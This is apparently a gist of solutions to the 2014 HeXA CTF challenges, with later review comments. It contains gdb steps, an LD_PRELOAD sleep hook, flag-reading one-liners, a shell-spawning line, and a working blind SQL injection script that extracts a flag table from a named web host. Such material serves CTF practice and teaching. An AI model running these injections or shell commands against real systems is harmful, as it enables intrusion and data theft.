@carpedm20
Last active August 29, 2015 14:06
HeXA 2nd CTF by tunz (2014.09.13)
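def rev_answer():
    """Return the string the original one-liner printed.

    It is constant arithmetic: the hex-encoded ASCII of 'aaaa' (0x61616161)
    is doubled and, together with 0xdeadbeef, subtracted from 0x20acecafe;
    the result is rendered back as ASCII and appended to 'aaa' * 2.
    """
    # int(text, 16) replaces eval('0x' + text): same value, no code execution.
    aaaa = int('aaaa'.encode('ascii').hex(), 16)
    value = 0x20acecafe - 0xdeadbeef - aaaa * 2
    # hex(value)[2:] in the original; bytes.fromhex needs an even digit count,
    # which this fixed value (8 hex digits) satisfies.
    return 'aaa' * 2 + bytes.fromhex(f'{value:x}').decode('latin-1')


print(rev_answer())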
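import subprocess

# Known-good answer that every oracle output is compared against.
with open('flag', 'r') as flag_file:
    flag = flag_file.read()


def run_oracle(candidate):
    """Feed *candidate* to ./rev200 via the file '123' and return what it writes to 'output'.

    The binary is used as a black box: only the text it leaves in 'output'
    is inspected. Scratch file names are the ones the original script used.
    """
    with open('123', 'w') as f:
        f.write(candidate)
    # The original used call(..., stdout=PIPE), which never drains the pipe
    # and can block once the child fills the pipe buffer; DEVNULL discards
    # stdout without that hazard.
    subprocess.run(["./rev200", "123", "output"], stdout=subprocess.DEVNULL, check=False)
    with open('output', 'r') as f:
        return f.read()


string = "The"
while True:
    for i in range(32, 127):  # printable ASCII, '~' (126) included
        tmp_string = string + chr(i)
        cracked = run_oracle(tmp_string)
        # An empty oracle output is a substring of everything and must not
        # count as a hit.
        if cracked and cracked in flag:
            print("find : %s" % chr(i))
            string = tmp_string
            print("************* : " + string)
            break
    else:
        # A full pass extended nothing: stop instead of rescanning the same
        # range forever, which is what the original while-loop did.
        break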
gdb rev50
# Stop at the entry of the password routine, then again 82 bytes into its
# body — presumably just after the candidate has been loaded for comparison;
# confirm the offset with `disas check_password` before relying on it.
(gdb) b check_password
(gdb) b *(check_password+82)
# Dump ten NUL-terminated strings starting at the address held in rdi. On
# x86-64 SysV rdi carries the first argument, so this is most likely the
# buffer check_password received — verify against the disassembly.
(gdb) x/10s $rdi
// System call `sleep` hooking
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
/*
 * LD_PRELOAD replacement for libc's sleep(3): returns at once so the
 * target's delay costs nothing while it is examined under gdb (see the
 * build and run lines below). The unistd.h signature is kept unchanged so
 * the dynamic linker resolves this definition ahead of the libc one.
 * Always reports 0, i.e. "the full interval elapsed".
 */
unsigned int sleep (unsigned int __seconds)
{
    (void)__seconds;  /* deliberately ignored: no delay at all */
    return 0;
}
// gcc -shared -ldl -fPIC test.c -o libdl_prog3.so
// LD_PRELOAD=/home/carpedm20/ctf/libdl_prog3.so ./rev80
// gdb rev80
// ...
// find the flag
# Reads the sys50 challenge flag and writes it to stdout. `sys` is not
# imported on this line, so it presumably runs where `sys` is already in
# scope — confirm. The file object is never closed; tolerable for a one-shot
# line, but use `with open(...)` if this ever grows into a script.
sys.stdout.write(open('/home/sys50/flag').read())
# Other solution from `silvara`
# __import__('os').execl('/bin/sh','sh')
file:///home/web100/flag
# NOTE(review): indentation was lost in the paste; it is restored here on the
# most plausible nesting (`print tb` after the position loop) — confirm
# against the original.
import requests
import time  # unused in what follows; presumably left from a throttled version
s = requests.Session()
data = {'loginID':'asdf','loginPW':'asdf'}
# Log in once so any session cookie set here is sent with every probe below.
r = s.post('http://web150.tunz.kr/login_ok.php',data=data)
# Presumably a login-success marker; -1 means the session is not usable.
print r.text.find('2014')
# The trailing quote closes the string literal the server builds its query
# from: `sindex` is concatenated into SQL, which is the defect exercised
# here. Server-side fix: bind `sindex` as a prepared-statement parameter and
# reject non-numeric values before any query is built.
url = "http://web150.tunz.kr/ajax/add.php?sindex=0'"
if True:  # no-op guard, presumably left from toggling the two older queries
    #query = url + " or ascii(substr((select table_name FROM information_schema.tables limit 1 offset %s),%s,1))>%s -- "
    #query = url + " or ascii(substr((select column_name FROM information_schema.columns where table_name='flag_hidden' limit 1 offset %s),%s,1))>%s -- "
    # Boolean-based blind extraction: each request asks one yes/no question
    # (is character %s of row %s greater than %s?) and reads the answer from
    # the page text, never from returned data. NOTE(review): the
    # ascii/substr/limit-offset forms are MySQL syntax — confirm.
    query = url + " or ascii(substr((select flag FROM flag_hidden limit 1 offset %s),%s,1))>%s -- "
    for i in range(0,100):
        # Position 1 / threshold 1 first: only checks whether row i exists.
        data = query % (i, 1, 1)
        r = s.get(data)
        print "========= %s ==========" % i
        if 'Wrong' not in r.text:
            tb = ""
            for character_idx in range(1,50):
                # Linear scan of printable ASCII 32..125 ('~' is never tried).
                # Each character costs up to 94 requests, so one row produces
                # thousands of near-identical GETs to add.php containing
                # ascii(substr( — an easy signature for access-log review or a
                # WAF rule.
                for character in range(32, 126):
                    data = query % (i, character_idx, character)
                    r = s.get(data)
                    if 'Already' not in r.text: #True response
                        print chr(character)
                        tb += chr(character)
                        break
            print tb